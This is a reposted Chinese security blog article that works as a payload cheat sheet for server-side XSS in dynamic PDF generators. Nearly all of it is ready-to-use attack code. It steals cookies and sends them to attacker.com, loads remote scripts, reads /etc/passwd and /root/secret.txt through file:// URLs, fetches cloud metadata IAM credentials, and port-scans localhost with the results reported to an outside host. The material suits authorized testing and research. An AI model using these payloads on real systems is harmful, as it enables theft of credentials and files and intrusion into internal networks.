Server Side XSS (Dynamic PDF)

admin 2022年5月26日15:24:50安全闲碎评论7 views3499字阅读11分39秒阅读模式

基本介绍

如果一个网页正在使用用户控制的输入创建一个PDF,您可以尝试欺骗创建PDF的机器人执行任意JS代码,PDF creator bot发现某种HTML标签后它将解释它们,您可以滥用这种行为来导致服务器XSS,需要注意的是<script><script>标记并不总是有效,所以您需要一个不同的方法来执行JS(例如:滥用<img),另外在常规的开发中

在常规开发中将能够看到下载创建的pdf,因此您将能够看到您通过JS编写的所有内容(例如:使用document.write()),如果您看不到创建的PDF您可能需要提取向您发出web请求的信息


常用载荷

Discovy Payload

<!-- Basic discovery, Write somthing--><img src="x" onerror="document.write('test')" /><script>document.write(JSON.stringify(window.location))</script><script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<!--Basic blind discovery, load a resource--><img src="http://attacker.com"/><img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie"><script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script><link rel=attachment href="http://attacker.com">


SVG Payload

在这个SVG有效负载中可以使用以下任何先前的有效负载,以一个iframe访问burpcollaborator子域和另一个iframe访问元数据端点为例

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">    <g>        <foreignObject width="800" height="500">            <body xmlns="http://www.w3.org/1999/xhtml">                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>            </body>        </foreignObject>    </g></svg>

<svg width="100%" height="100%" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"> <circle cx="50" cy="50" r="45" fill="green" id="foo"/> <script type="text/javascript"> // <![CDATA[ alert(1); // ]]></script></svg>

你可以通过访问以下链接获取更多载荷:

https://github.com/allanlw/svg-cheatsheet


Path disclosure

<!-- If the bot is accessing a file:// path, you will discover the internal pathif not, you will at least have wich path the bot is accessing --><img src="x" onerror="document.write(window.location)" /><script> document.write(window.location) </script>


Load an external script

<script src="http://attacker.com/myscripts.js"></script><img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

Read local file


<script>x=new XMLHttpRequest;x.onload=function(){document.write(btoa(this.responseText))};x.open("GET","file:///etc/passwd");x.send();</script>


<script>    xhzeem = new XMLHttpRequest();    xhzeem.open("GET","file:///etc/passwd");    xhzeem.send();    xhzeem.onload = function(){document.write(this.responseText);}    xhzeem.onerror = function(){document.write('failed!')}</script>


<iframe src=file:///etc/passwd></iframe><img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/><link rel=attachment href="file:///root/secret.txt"><object data="file:///etc/passwd"><portal src="file:///etc/passwd" id=portal>


Get external web page response as attachment (metadata endpoints)


<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">


Bot delay

<!--Make the bot send a ping every 500ms to check how long does the bot wait--><script>    let time = 500;    setInterval(()=>{        let img = document.createElement("img");        img.src = `https://attacker.com/ping?time=${time}ms`;        time += 500;    }, 500);</script><img src="https://attacker.com/delay">


Port Scan

<!--Scan local port and receive a ping indicating which ones are found--><script>const checkPort = (port) => {    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {        let img = document.createElement("img");        img.src = `http://attacker.com/ping?port=${port}`;    });}
for(let i=0; i<1000; i++) { checkPort(i);}</script><img src="https://attacker.com/startingScan">


Referer

https://lbherrera.github.io/lab/h1415-ctf-writeup.html

https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/

原文始发于微信公众号(七芒星实验室):Server Side XSS (Dynamic PDF)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月26日15:24:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Server Side XSS (Dynamic PDF) http://cn-sec.com/archives/1052039.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: